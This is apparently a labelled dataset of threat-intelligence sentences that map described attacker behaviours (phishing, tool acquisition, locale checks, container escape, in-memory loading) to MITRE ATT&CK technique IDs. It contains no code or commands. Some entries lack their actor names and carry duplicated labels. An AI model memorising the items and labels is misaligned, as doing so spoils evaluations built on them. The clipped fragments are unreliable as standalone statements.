{"text1":"Magic Hound has established email accounts using fake personas for spearphishing operations.","labels":"['T1585.002']"}
{"text1":"Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.","labels":"['T1585.002']"}
{"text1":"Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.","labels":"['T1585.002']"}
{"text1":"Leviathan has compromised social media accounts to conduct social engineering attacks.","labels":"['T1586.001']"}
{"text1":"APT28 has used compromised email accounts to send credential phishing emails.","labels":"['T1586.002']"}
{"text1":"HEXANE has used compromised accounts to send spearphishing emails.","labels":"['T1586.002']"}
{"text1":"IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations.","labels":"['T1586.002']"}
{"text1":"Kimsuky has compromised email accounts to send spearphishing e-mails.","labels":"['T1586.002']"}
{"text1":"Leviathan has compromised email accounts to conduct social engineering attacks.","labels":"['T1586.002']"}
{"text1":"Kimsuky created and used a mailing toolkit to use in spearphishing attacks.","labels":"['T1587']"}
{"text1":"APT29 has leveraged numerous pieces of malware that appear to be unique to APT29 and were likely developed for or by the group.","labels":"['T1587.001']"}
{"text1":"Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.","labels":"['T1587.001']"}
{"text1":"Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.","labels":"['T1587.001']"}
{"text1":"During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers.","labels":"['T1587.001']"}
{"text1":"FIN7 has developed malware for use in operations, including the creation of infected removable media.","labels":"['T1587.001']"}
{"text1":"For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.","labels":"['T1587.001']"}
{"text1":"For Operation Sharpshooter, the threat actors used the Rising Sun modular backdoor.","labels":"['T1587.001']"}
{"text1":"Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks.","labels":"['T1587.001']"}
{"text1":"Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines.","labels":"['T1587.001']"}
{"text1":"Night Dragon used privately developed and customized remote access tools.","labels":"['T1587.001']"}
{"text1":"Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer.","labels":"['T1587.001']"}
{"text1":"TeamTNT has developed custom malware such as Hildegard.","labels":"['T1587.001']"}
{"text1":"Turla has developed its own unique malware for use in operations.","labels":"['T1587.001']"}
{"text1":"UNC2452 developed SUNSPOT, SUNBURST, TEARDROP, and Raindrop; SUNSPOT and SUNBURST were tailored to be incorporated into SolarWind's Orion software library.","labels":"['T1587.001']"}
{"text1":"PROMETHIUM has created self-signed certificates to sign malicious installers.","labels":"['T1587.002']"}
{"text1":"Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.","labels":"['T1587.002']"}
{"text1":"APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.","labels":"['T1587.003']"}
{"text1":"For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered.","labels":"['T1587.003']"}
{"text1":"PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.","labels":"['T1587.003']"}
{"text1":"APT1 used publicly available malware for privilege escalation.","labels":"['T1588.001']"}
{"text1":"During Night Dragon, threat actors used Trojans from underground hacker websites.","labels":"['T1588.001']"}
{"text1":"For C0015, the threat actors used Cobalt Strike and Conti ransomware.","labels":"['T1588.001']"}
{"text1":"For FunnyDream, the threat actors used a new backdoor named FunnyDream.","labels":"['T1588.001']"}
{"text1":"For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT.","labels":"['T1588.001']"}
{"text1":"LAPSUS$ acquired and used the Redline password stealer in their operations.","labels":"['T1588.001']"}
{"text1":"LazyScripter has used a variety of open-source remote access Trojans for its operations.","labels":"['T1588.001']"}
{"text1":"TA505 has used malware such as Azorult and Cobalt Strike in their operations.","labels":"['T1588.001']"}
{"text1":"Turla has used malware obtained after compromising other threat actors, such as OilRig.","labels":"['T1588.001']"}
{"text1":"APT-C-36 obtained and used a modified variant of Imminent Monitor.","labels":"['T1588.002']"}
{"text1":"APT1 has used various open-source tools for privilege escalation purposes.","labels":"['T1588.002']"}
{"text1":"APT19 has obtained and used publicly-available tools like Empire.","labels":"['T1588.002']"}
{"text1":"APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.","labels":"['T1588.002']"}
{"text1":"APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike.","labels":"['T1588.002']"}
{"text1":"APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.","labels":"['T1588.002']"}
{"text1":"APT33 has obtained and leveraged publicly-available tools for early intrusion activities.","labels":"['T1588.002']"}
{"text1":"APT38 has obtained and used open-source tools such as Mimikatz.","labels":"['T1588.002']"}
{"text1":"Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.","labels":"['T1588.002']"}
{"text1":"BITTER has obtained tools such as PuTTY for use in their operations.","labels":"['T1588.002']"}
{"text1":"BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.","labels":"['T1588.002']"}
{"text1":"BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.","labels":"['T1588.002']"}
{"text1":"BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations.","labels":"['T1588.002']"}
{"text1":"Carbanak has obtained and used open-source tools such as PsExec and Mimikatz.","labels":"['T1588.002']"}
{"text1":"Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.","labels":"['T1588.002']"}
{"text1":"CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities.","labels":"['T1588.002']"}
{"text1":"CostaRicto has obtained open source tools to use in their operations.","labels":"['T1588.002']"}
{"text1":"DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike.","labels":"['T1588.002']"}
{"text1":"Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.","labels":"['T1588.002']"}
{"text1":"During CostaRicto, the threat actors obtained open source tools to use in their operations.","labels":"['T1588.002']"}
{"text1":"Earth Lusca has acquired and used a variety of open source tools.","labels":"['T1588.002']"}
{"text1":"Ember Bear has obtained and used open source scripts from GitHub.","labels":"['T1588.002']"}
{"text1":"FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.","labels":"['T1588.002']"}
{"text1":"FIN5 has obtained and used a customized version of PsExec, as well as use other tools such as pwdump, SDelete, and Windows Credential Editor.","labels":"['T1588.002']"}
{"text1":"FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.","labels":"['T1588.002']"}
{"text1":"Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.","labels":"['T1588.002']"}
{"text1":"For C0015, the threat actors obtained a variety of tools, including AdFind,  AnyDesk, and Process Hacker.","labels":"['T1588.002']"}
{"text1":"For Frankenstein, the threat actors obtained and used Empire.","labels":"['T1588.002']"}
{"text1":"For FunnyDream, the threat actors used a modified version of the open source PcShare remote administration tool.","labels":"['T1588.002']"}
{"text1":"For Operation Spalax, the threat actors obtained packers such as CyaX.","labels":"['T1588.002']"}
{"text1":"For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound.","labels":"['T1588.002']"}
{"text1":"Frankenstein has obtained and used Empire to deploy agents.","labels":"['T1588.002']"}
{"text1":"GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and\/or subvert antimalware solutions.","labels":"['T1588.002']"}
{"text1":"Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.","labels":"['T1588.002']"}
{"text1":"Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec.","labels":"['T1588.002']"}
{"text1":"LAPSUS$ has obtained tools such as AD Explorer inspection software for their operations.","labels":"['T1588.002']"}
{"text1":"Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.","labels":"['T1588.002']"}
{"text1":"Moses Staff has used the commercial tool DiskCryptor.","labels":"['T1588.002']"}
{"text1":"MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.","labels":"['T1588.002']"}
{"text1":"Night Dragon has obtained and used tools such as gsecdump.","labels":"['T1588.002']"}
{"text1":"POLONIUM has obtained and used tools such as AirVPN and plink in their operations.","labels":"['T1588.002']"}
{"text1":"PittyTiger has obtained and used tools such as Mimikatz and gsecdump.","labels":"['T1588.002']"}
{"text1":"Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack.","labels":"['T1588.002']"}
{"text1":"Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.","labels":"['T1588.002']"}
{"text1":"TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.","labels":"['T1588.002']"}
{"text1":"TEMP.Veles has obtained and used tools such as Mimikatz and PsExec.","labels":"['T1588.002']"}
{"text1":"Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.","labels":"['T1588.002']"}
{"text1":"Turla has obtained and customized publicly-available tools like Mimikatz.","labels":"['T1588.002']"}
{"text1":"WIRTE has obtained and used Empire for post-exploitation activities.","labels":"['T1588.002']"}
{"text1":"Whitefly has obtained and used tools such as Mimikatz.","labels":"['T1588.002']"}
{"text1":"Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz.","labels":"['T1588.002']"}
{"text1":"menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump.","labels":"['T1588.002']"}
{"text1":"Ember Bear has stolen legitimate certificates to sign malicious payloads.","labels":"['T1588.003']"}
{"text1":"Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.","labels":"['T1588.003']"}
{"text1":"MegaCortex has used code signing certificates issued to fake companies to bypass security controls.","labels":"['T1588.003']"}
{"text1":"Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware.","labels":"['T1588.003']"}
{"text1":"BlackTech has used valid, stolen digital certificates for some of their malware and tools.","labels":"['T1588.004']"}
{"text1":"Kimsuky has obtained exploit code for various CVEs.","labels":"['T1588.005']"}
{"text1":"In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.","labels":"['T1588.006']"}
{"text1":"APT32 has conducted targeted surveillance against activists and bloggers.","labels":"['T1589']"}
{"text1":"HEXANE has identified specific potential victims at targeted organizations.","labels":"['T1589']"}
{"text1":"LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.","labels":"['T1589']"}
{"text1":"APT28 has harvested user's login credentials.","labels":"['T1589.001']"}
{"text1":"APT29 has conducted credential theft operations to obtain credentials to be used for access to victim environments.","labels":"['T1589.001']"}
{"text1":"Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.","labels":"['T1589.001']"}
{"text1":"LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.","labels":"['T1589.001']"}
{"text1":"Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites.","labels":"['T1589.001']"}
{"text1":"AADInternals can check for the existence of user email addresses using public Microsoft APIs.","labels":"['T1589.002']"}
{"text1":"APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.","labels":"['T1589.002']"}
{"text1":"EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms.","labels":"['T1589.002']"}
{"text1":"HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.","labels":"['T1589.002']"}
{"text1":"Kimsuky has collected valid email addresses that were subsequently used in spearphishing campaigns.","labels":"['T1589.002']"}
{"text1":"Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.","labels":"['T1589.002']"}
{"text1":"Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.","labels":"['T1589.002']"}
{"text1":"Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches.","labels":"['T1589.002']"}
{"text1":"Sandworm Team's research of potential victim organizations included the identification and collection of employee information.","labels":"['T1589.003']"}
{"text1":"Silent Librarian has collected lists of names for individuals from targeted organizations.","labels":"['T1589.003']"}
{"text1":"AADInternals can gather information about a tenant\u2019s domains using public Microsoft APIs.","labels":"['T1590.001']"}
{"text1":"Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.","labels":"['T1590.001']"}
{"text1":"Andariel has limited its watering hole attacks to specific IP address ranges.","labels":"['T1590.005']"}
{"text1":"Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and\/or individuals.","labels":"['T1591']"}
{"text1":"Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.","labels":"['T1591.002']"}
{"text1":"LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships.","labels":"['T1591.002']"}
{"text1":"HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.","labels":"['T1591.004']"}
{"text1":"LAPSUS$ has gathered detailed knowledge of team structures within a target organization.","labels":"['T1591.004']"}
{"text1":"Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.","labels":"['T1591.004']"}
{"text1":"Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.","labels":"['T1592.002']"}
{"text1":"Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.","labels":"['T1592.002']"}
{"text1":"HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.","labels":"['T1592.004']"}
{"text1":"EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.","labels":"['T1593.001']"}
{"text1":"Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.","labels":"['T1593.001']"}
{"text1":"Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization.","labels":"['T1593.001']"}
{"text1":"Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.","labels":"['T1593.002']"}
{"text1":"LAPSUS$ has searched public code repositories for exposed credentials.","labels":"['T1593.003']"}
{"text1":"EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails.","labels":"['T1594']"}
{"text1":"Kimsuky has searched for information on the target company's website.","labels":"['T1594']"}
{"text1":"Sandworm Team has conducted research against potential victim websites as part of its operational planning.","labels":"['T1594']"}
{"text1":"TeamTNT has scanned specific lists of target IP addresses.","labels":"['T1595.001']"}
{"text1":"APT28 has performed large-scale scans in an attempt to find vulnerable servers.","labels":"['T1595.002']"}
{"text1":"APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.","labels":"['T1595.002']"}
{"text1":"Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets.","labels":"['T1595.002']"}
{"text1":"Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to Log4j (CVE-2021-44228).","labels":"['T1595.002']"}
{"text1":"Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.","labels":"['T1595.002']"}
{"text1":"TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.","labels":"['T1595.002']"}
{"text1":"Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.","labels":"['T1595.003']"}
{"text1":"EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.","labels":"['T1597']"}
{"text1":"LAPSUS$ has purchased credentials and session tokens from criminal underground forums.","labels":"['T1597.002']"}
{"text1":"APT28 has used spearphishing to compromise credentials.","labels":"['T1598']"}
{"text1":"ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.","labels":"['T1598']"}
{"text1":"Astaroth has been delivered via malicious e-mail attachments.","labels":"['T1598.002']"}
{"text1":"Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.","labels":"['T1598.002']"}
{"text1":"Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.","labels":"['T1598.002']"}
{"text1":"AADInternals can send phishing emails containing malicious links designed to collect users\u2019 credentials.","labels":"['T1598.003']"}
{"text1":"APT28 has conducted credential phishing campaigns with embedded links to attacker-controlled domains.","labels":"['T1598.003']"}
{"text1":"APT32 has used malicious links to direct users to web pages designed to harvest credentials.","labels":"['T1598.003']"}
{"text1":"Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1598.003']"}
{"text1":"Kimsuky has used links in e-mail to steal account information.","labels":"['T1598.003']"}
{"text1":"Magic Hound has used SMS and email messages with links designed to steal credentials.","labels":"['T1598.003']"}
{"text1":"SMOKEDHAM has been delivered via malicious links in phishing emails.","labels":"['T1598.003']"}
{"text1":"Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.","labels":"['T1598.003']"}
{"text1":"Sidewinder has sent e-mails with malicious links to credential harvesting websites.","labels":"['T1598.003']"}
{"text1":"Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.","labels":"['T1598.003']"}
{"text1":"SYNful Knock is malware that is inserted into a network device by patching the operating system image.","labels":"['T1601.001']"}
{"text1":"APT29 has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.","labels":"['T1606.001']"}
{"text1":"AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.","labels":"['T1606.002']"}
{"text1":"APT29 created tokens using compromised SAML signing certificates.","labels":"['T1606.002']"}
{"text1":"UNC2452 created tokens using compromised SAML signing certificates.","labels":"['T1606.002']"}
{"text1":"Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims.","labels":"['T1608']"}
{"text1":"APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.","labels":"['T1608.001']"}
{"text1":"BITTER has registered domains to stage payloads.","labels":"['T1608.001']"}
{"text1":"During Night Dragon, threat actors uploaded commonly available hacker tools to compromised web servers.","labels":"['T1608.001']"}
{"text1":"EXOTIC LILY  has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.","labels":"['T1608.001']"}
{"text1":"Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.","labels":"['T1608.001']"}
{"text1":"For C0011, Transparent Tribe hosted malicious documents on domains registered by the group.","labels":"['T1608.001']"}
{"text1":"For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites.","labels":"['T1608.001']"}
{"text1":"For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.","labels":"['T1608.001']"}
{"text1":"Gamaredon Group has registered domains to stage payloads.","labels":"['T1608.001']"}
{"text1":"HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.","labels":"['T1608.001']"}
{"text1":"Kimsuky has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.","labels":"['T1608.001']"}
{"text1":"Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.","labels":"['T1608.001']"}
{"text1":"LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub.","labels":"['T1608.001']"}
{"text1":"SideCopy has used compromised domains to host its malicious payloads.","labels":"['T1608.001']"}
{"text1":"TA505 has staged malware on actor-controlled domains.","labels":"['T1608.001']"}
{"text1":"TeamTNT has uploaded backdoored Docker images to Docker Hub.","labels":"['T1608.001']"}
{"text1":"Threat Group-3390 has hosted malicious payloads on Dropbox.","labels":"['T1608.001']"}
{"text1":"For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.","labels":"['T1608.002']"}
{"text1":"Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.","labels":"['T1608.002']"}
{"text1":"Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites.","labels":"['T1608.002']"}
{"text1":"Dragonfly has compromised websites to redirect traffic and to host exploit kits.","labels":"['T1608.004']"}
{"text1":"For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.","labels":"['T1608.004']"}
{"text1":"Threat Group-3390 has embedded malicious code into websites to screen a potential victim's IP address and then exploit their browser if they are of interest.","labels":"['T1608.004']"}
{"text1":"Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools.","labels":"['T1608.004']"}
{"text1":"Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites.","labels":"['T1608.005']"}
{"text1":"Hildegard was executed through the kubelet API run command and by executing commands on running containers.","labels":"['T1609']"}
{"text1":"Kinsing was executed with an Ubuntu container entry point that runs shell scripts.","labels":"['T1609']"}
{"text1":"Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.","labels":"['T1609']"}
{"text1":"Kinsing was run through a deployed Ubuntu container.","labels":"['T1610']"}
{"text1":"Peirates can deploy a pod that mounts its node\u2019s root file system, then execute a command to create a reverse shell on the node.","labels":"['T1610']"}
{"text1":"TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges.","labels":"['T1610']"}
{"text1":"Doki\u2019s container was configured to bind the host root directory.","labels":"['T1611']"}
{"text1":"Hildegard has used the BOtB tool that can break out of containers.","labels":"['T1611']"}
{"text1":"Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.","labels":"['T1611']"}
{"text1":"TeamTNT has deployed privileged containers that mount the filesystem of victim machine.","labels":"['T1611']"}
{"text1":"Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.","labels":"['T1613']"}
{"text1":"TeamTNT has checked for running containers with \"docker ps\" and for specific container names with \"docker inspect\". TeamTNT has also searched for Kubernetes pods running in a local network.","labels":"['T1613']"}
{"text1":"Crimson can identify the geographical location of a victim host.","labels":"['T1614']"}
{"text1":"GrimAgent can identify the country code on a compromised host.","labels":"['T1614']"}
{"text1":"QuasarRAT can determine the country a victim host is located in.","labels":"['T1614']"}
{"text1":"SDBbot can collected the country code of a compromised machine.","labels":"['T1614']"}
{"text1":"Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.","labels":"['T1614']"}
{"text1":"Clop has checked the keyboard language using the GetKeyboardLayout() function to avoid installation on Russian-language or other Commonwealth of Independent States-language machines; it will also check the \"GetTextCharset\" function.","labels":"['T1614.001']"}
{"text1":"Flagpro can check whether the target system is using Japanese, Taiwanese, or English through detection of specific Windows Security and Internet Explorer dialog.","labels":"['T1614.001']"}
{"text1":"GrimAgent has used \"Accept-Language\" to identify hosts in the United Kingdom, United States, France, and Spain.","labels":"['T1614.001']"}
{"text1":"Ke3chang has used implants to collect the system language ID of a compromised machine.","labels":"['T1614.001']"}
{"text1":"Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.","labels":"['T1614.001']"}
{"text1":"Maze has checked the language of the machine with function \"GetUserDefaultUILanguage\" and terminated execution if the language matches with an entry in the predefined list.","labels":"['T1614.001']"}
{"text1":"Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.","labels":"['T1614.001']"}
{"text1":"Neoichor can identify the system language on a compromised host.","labels":"['T1614.001']"}
{"text1":"Ryuk has been observed to query the registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\" and the value \"InstallLanguage\". If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution.","labels":"['T1614.001']"}
{"text1":"SharpStage  has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.","labels":"['T1614.001']"}
{"text1":"Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit.","labels":"['T1614.001']"}
{"text1":"Spark has checked the results of the \"GetKeyboardLayoutList\" and the language name returned by \"GetLocaleInfoA\" to make sure they contain the word \u201cArabic\u201d before executing.","labels":"['T1614.001']"}
{"text1":"XCSSET uses AppleScript to check the host's language and location with the command \"user locale of (get system info)\".","labels":"['T1614.001']"}
{"text1":"Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.","labels":"['T1614.001']"}
{"text1":"Emissary has the capability to execute \"gpresult\".","labels":"['T1615']"}
{"text1":"Empire includes various modules for enumerating Group Policy.","labels":"['T1615']"}
{"text1":"Turla surveys a system upon check-in to discover Group Policy details using the \"gpresult\" command.","labels":"['T1615']"}
{"text1":"Cobalt Strike's \"execute-assembly\" command can run a .NET executable within the memory of a sacrificial process by loading the CLR.","labels":"['T1620']"}
{"text1":"Cuba loaded the payload into memory using PowerShell.","labels":"['T1620']"}
{"text1":"Donut can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.","labels":"['T1620']"}
{"text1":"FoggyWeb's loader has reflectively loaded .NET-based assembly\/payloads into memory.","labels":"['T1620']"}
{"text1":"Gelsemium can use custom shellcode to map embedded DLLs into memory.","labels":"['T1620']"}
{"text1":"IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.","labels":"['T1620']"}
{"text1":"Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.","labels":"['T1620']"}
{"text1":"PowerSploit reflectively loads a Windows PE file into a process.","labels":"['T1620']"}
{"text1":"APT29 has used repeated MFA requests to gain access to victim accounts.","labels":"['T1621']"}
{"text1":"LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.","labels":"['T1621']"}
{"text1":"ROKRAT can check for debugging tools.","labels":"['T1622']"}
{"text1":"Saint Bot has used `is_debugger_present` as part of its environmental checks.","labels":"['T1622']"}
{"text1":"ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging.","labels":"['T1622']"}
{"text1":"XCSSET uses the \"plutil\" command to modify the \"LSUIElement\", \"DFBundleDisplayName\", and \"CFBundleIdentifier\" keys in the \"\/Contents\/Info.plist\" file to change how XCSSET is visible on the system.","labels":"['T1647']"}
{"text1":"AADInternals can create and export various authentication certificates, including those associated with Azure AD joined\/registered devices.","labels":"['T1649']"}
{"text1":"APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.","labels":"['T1649']"}
{"text1":"Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.","labels":"['T1649']"}
{"text1":"creates a backdoor through which remote attackers can steal system information.","labels":"['T1005', 'T1005']"}
{"text1":"captures window titles.","labels":"['T1010', 'T1010']"}
{"text1":"hides any strings related to its own indicators of compromise.","labels":"['T1027', 'T1027']"}
{"text1":"creates a backdoor through which remote attackers can open a command-line interface.","labels":"['T1059', 'T1059']"}
{"text1":"stages collected data in a text file.","labels":"['T1074', 'T1074']"}
{"text1":"can download and execute a second-stage payload.","labels":"['T1105', 'T1105']"}
{"text1":"creates a backdoor through which remote attackers can upload files.","labels":"['T1105', 'T1105']"}
{"text1":"creates a Registry subkey that registers a new system device.","labels":"['T1112', 'T1112']"}
{"text1":"At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse","labels":"['T1564.001', 'T1564.001']"}
{"text1":"If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware\/lure, which he will execute afterwards","labels":"['T1204.002', 'T1105']"}
{"text1":"For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP","labels":"['T1071.001', 'T1041', 'T1071', 'T1132']"}
{"text1":"The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs","labels":"['T1056.001', 'T1056']"}
{"text1":"f) Hadoop YARN ResourceManager \u2013 Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability","labels":"['T1203', 'T1203', 'T1105']"}
{"text1":"The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems","labels":"['T1053.005', 'T1053', 'T1053.005']"}
{"text1":"\"beacon\" payload can collect information on process details.","labels":"['T1057']"}
{"text1":"\"beacon\" payload can receive C2 from one protocol and respond on another. This is typically a mixture of HTTP, HTTPS, and DNS traffic.","labels":"['T1026']"}
{"text1":"\"beacon\" payload is capable of capturing screen shots.","labels":"['T1113']"}
{"text1":"2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.","labels":"['T1070.004']"}
{"text1":"A  .dll file is digitally signed by a certificate from AirVPN.","labels":"['T1553.002']"}
{"text1":"A  .dll that contains  is loaded and executed using DLL side-loading.","labels":"['T1574.002']"}
{"text1":"A  2 plug-in uses WMI to gather victim host details.","labels":"['T1047']"}
{"text1":"A backdoor used by  created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.","labels":"['T1090.003']"}
{"text1":"abuses NTFS transactions to launch and conceal malicious processes.","labels":"['T1055.013']"}
